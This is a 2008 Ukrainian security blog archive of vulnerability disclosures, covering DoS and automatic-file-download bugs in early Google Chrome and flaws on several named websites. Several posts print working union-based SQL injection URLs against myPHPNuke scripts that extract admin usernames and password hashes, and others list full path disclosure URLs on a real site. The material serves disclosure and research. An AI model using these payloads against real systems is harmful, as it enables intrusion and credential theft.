Архів для категорії 'Уразливості'

Нова DoS уразливість в Google Chrome

23:55 04.09.2008

Пропоную вашій увазі мою другу уразливість в рамках проекту День багів в Google Chrome (Day of bugs in Google Chrome). Учора я виявив нову Denial of Service уразливість в браузері Google Chrome.

В даному випадку Chrome не виявляє завантаженності процесора, що призводить до перенавантаження комп’ютера (браузер не вилітає, тому це потенційний DoS). Що може бути вирішено лише закриттям необхідного таба чи браузера. При запуску експлоіта Хром одразу починає забирати 100% процесорних ресурсів, що перенавантажує увесь комп’ютер (CPU overload).

Експлоіт:

Google Chrome DoS Exploit-2.html

Уразлива версія Google Chrome 0.2.149.27.

DoS уразливість в Google Chrome

21:43 04.09.2008

Пропоную вашій увазі мою першу уразливість в рамках проекту День багів в Google Chrome (Day of bugs in Google Chrome). Учора я виявив Denial of Service уразливість в браузері Google Chrome.

В даному випадку Chrome не справляється з зацикленою функцією, що призводить до відмови браузера (DoS). При запуску експлоіта Хром одразу починає забирати 100% процесорних ресурсів та починає поступово забирати пам’ять (resources consumption) - і через деяких час вилітає. Причому вилітає повністю, без свого традиційного повідомлення “Whoa! Google Chrome has crashed. Restart now?” і можливості рестартнути браузер.

Експлоіт:

Google Chrome DoS Exploit.html

Уразлива версія Google Chrome 0.2.149.27.

Automatic File Download уразливості в Google Chrome

22:43 03.09.2008

Як я писав, учора вийшов Google Chrome. І викачавши сьогодні браузер для ознаймовлення з новим продуктом Гугла (до того ж найновішим браузером), я найперше звернув увагу на його безпеку.

І одразу виявив декілька уразливостей в Хромі. Про деякі з них я напишу найближчим часом, а зараз розповім про Automatic File Download уразливості в Google Chrome. Ще до того, як я викачав Хром, в ньому вже були виявлені дві уразливості й розроблені експлоіти для них (про які я детально напишу завтра).

Досліджуючи одну з даних уразливостей, що дозволяла автоматично завантажувати файли (що може бути використано для розповсюдження вірусів), я розробив нову версію експлоіта. Дана уразливість пов’язана з тегом iframe, в якому можна зіслатися на будь-який файл, в тому числі й exe. В моїй версії ескплоіта не потрібен JavaScript, тому він є більш універсальним.

Google Chrome Exploit-1 (original).html

Google Chrome Exploit-1.html

А також я виявив нову уразливість в Chrome, що дозволяє автоматично завантажувати файли - через тег frame.

Google Chrome Exploit-2.html

Уразлива версія Google Chrome 0.2.149.27.

Добірка уразливостей

16:12 03.09.2008

В даній добірці уразливості в веб додатках:

SQL Injection уразливості в myPHPNuke

23:54 02.09.2008

Нещодавно, 24.08.2008, після знайдення попередньої, я знайшов нові SQL Injection уразливості в системі myPHPNuke. Дірки я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

SQL Injection:

Уразливості в скрипті sections.php в параметрах artid та secid.

http://site/sections.php?op=viewarticle&artid=-1%20union%20select%20null,null,aid,pwd,null,null,null,null%20from%20mpn_authors%20limit%200,1

http://site/sections.php?op=listarticles&secid=-1%20union%20select%20concat(aid,char(45),pwd)%20from%20mpn_authors%20limit%200,1

Уразливі версії до myPHPNuke 1.8.8_8rc2 (тому що в останній версії наявні додаткові фільтри). При цьому остання версія системи також уразлива - в ній можлива обмежена SQL Injection атака.

Уразливості на cydem.org.ua

19:49 02.09.2008

21.02.2007

Ще в вересні, 07.09.2006, я знайшов Cross-Site Scripting уразливості на секюріті (хакерському) проекті http://cydem.org.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

02.09.2008

XSS:

Дані уразливості досі повністю не виправлені.

SQL Injection уразливість в myPHPNuke

23:58 30.08.2008

Нещодавно, 24.08.2008, я знайшов SQL Injection уразливість в системі myPHPNuke. Дірку я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про знайдені мною уразливості в myPHPNuke.

SQL Injection:

http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,null,null%20from%20mpn_authors%20limit%200,1

Уразливі версії до myPHPNuke 1.8.8_8rc2 (тому що в останній версії наявні додаткові фільтри). При цьому остання версія системи також уразлива - в ній можлива обмежена SQL Injection атака.

Добірка уразливостей

16:34 30.08.2008

В даній добірці уразливості в веб додатках:

  • drupal Zend Hash Del Key Or Index php injection (деталі)
  • SAP DB Web Server Stack Overflow (деталі)
  • SAP Message Server Heap Overflow (деталі)
  • Sitebar 3.3.5 (index.php writerFile)Remote File Include Vulnerabilities (деталі)
  • Pixaria Gallery 1.0 (class.Smarty.php) Remote File Include Vulnerability (деталі)
  • Back-End CMS Database Tables v0.4.7 Cross Site Scripting (деталі)
  • bloofoxCMS 0.2.2 Cross Site Scripting (деталі)
  • MobilePublisherphp v1.1.2 Remote File Include Vulnerabilities (деталі)
  • FloweRS v2.0 Cross Site Scripting (деталі)
  • Back-End CMS Database Tables v0.4.7 Remote File Include Vulnerabilities (деталі)

Нова SQL Injection уразливість в myPHPNuke

23:58 29.08.2008

Сьогодні, 29.08.2008, після знайдення попередніх уразливостей в myPHPNuke, я знайшов нову SQL Injection уразливість в системі myPHPNuke. Дірку я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

SQL Injection:

http://site/article.php?sid=-1%20union%20select%20null,null,null,null,aid,pwd,null,null,null%20from%20mpn_authors%20limit%200,1

Уразливі версії до myPHPNuke 1.8.8_8rc2 (тому що в останній версії системи наявні додаткові фільтри). При цьому остання версія також уразлива - при відключених magic quotes в ній можлива обмежена SQL Injection атака.

Уразливості на inform.pl.ua

21:24 29.08.2008

21.04.2008

У серпні, 04.09.2007, а також додатково сьогодні, я знайшов Full path disclosure та Cross-Site Scripting уразливості на проекті http://inform.pl.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

29.08.2008

Сайт змінив свій домен з http://inform.pl.ua на http://poltava.info (і зі старого домена відбувається редирект на новий).

Full path disclosure:

http://inform.pl.ua/goroda.php

http://inform.pl.ua/link/phone.php

http://inform.pl.ua/link/confirm_image.php

http://inform.pl.ua/link/menu.php

XSS:

Дані уразливості вже виправлені. Але замість старої XSS дірки в пошуці була зроблена нова XSS в пошуці по сайту. На оновленому сайті http://poltava.info був розміщений новий локальний пошуковець - Користувацький пошук Гугла, також відомий як Google Custom Search Engine, про дірку в якому я писав (подібне й має місце на даному сайті).

XSS: